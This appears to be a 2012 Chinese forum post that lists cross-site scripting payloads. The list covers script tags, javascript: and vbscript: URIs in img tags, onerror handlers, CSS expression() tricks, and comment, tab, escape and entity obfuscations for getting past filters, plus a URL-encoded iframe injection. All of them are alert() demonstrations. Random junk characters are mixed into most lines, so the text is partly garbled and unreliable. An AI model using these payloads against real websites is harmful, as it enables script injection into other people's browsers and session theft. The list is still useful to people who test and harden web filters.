<script>alert("跨站")</script> (最常用)( `. j" c) A0 a; F# [
<img scr=javascript:alert("跨站")></img>. a8 w6 i5 g. l! k& A- ]
<img scr="javascript: alert(/跨站/)></img>
% G/ [# b9 w" K3 J* a% r<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)+ [' a9 T9 T+ Y( w: B$ R% o
<img scr="#" onerror=alert(/跨站/)></img>
* F9 N. U1 R! X0 [<img scr="#" style="xss:expression(alert(/xss/));"></img>
! \9 Y; o! s0 ^& R<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
5 k" t! e* b) m, r+ e7 c<img src=vbscript:msgbox ("xss")></img>
( t$ c B8 Y c. Q8 Z* U' i; b<style> input {left:expression (alert('xss'))}</style>+ k6 ]' h( P5 Y; p- P. [1 Z
<div style={left:expression (alert('xss'))}></div>' e* M% F6 g$ B0 J9 ^* C
<div style={left:exp/* */ression (alert('xss'))}></div>+ ~7 l" p' C: u1 A# w1 A
<div style={left:\0065\0078ression (alert('xss'))}></div>+ G6 N8 }- Y1 [" ~ n; Z
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
- }3 |% O/ b+ h5 b2 Funicode <div style="{left:expRessioN (alert('xss'))}">
' q6 {# G8 X4 b2 ~6 ]; |9 `8 E, z& n. T) c0 f* z3 [
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["5 M0 m* U5 t) x/ c
|
发表于 2012-9-15 14:09:13
收藏
支持
反对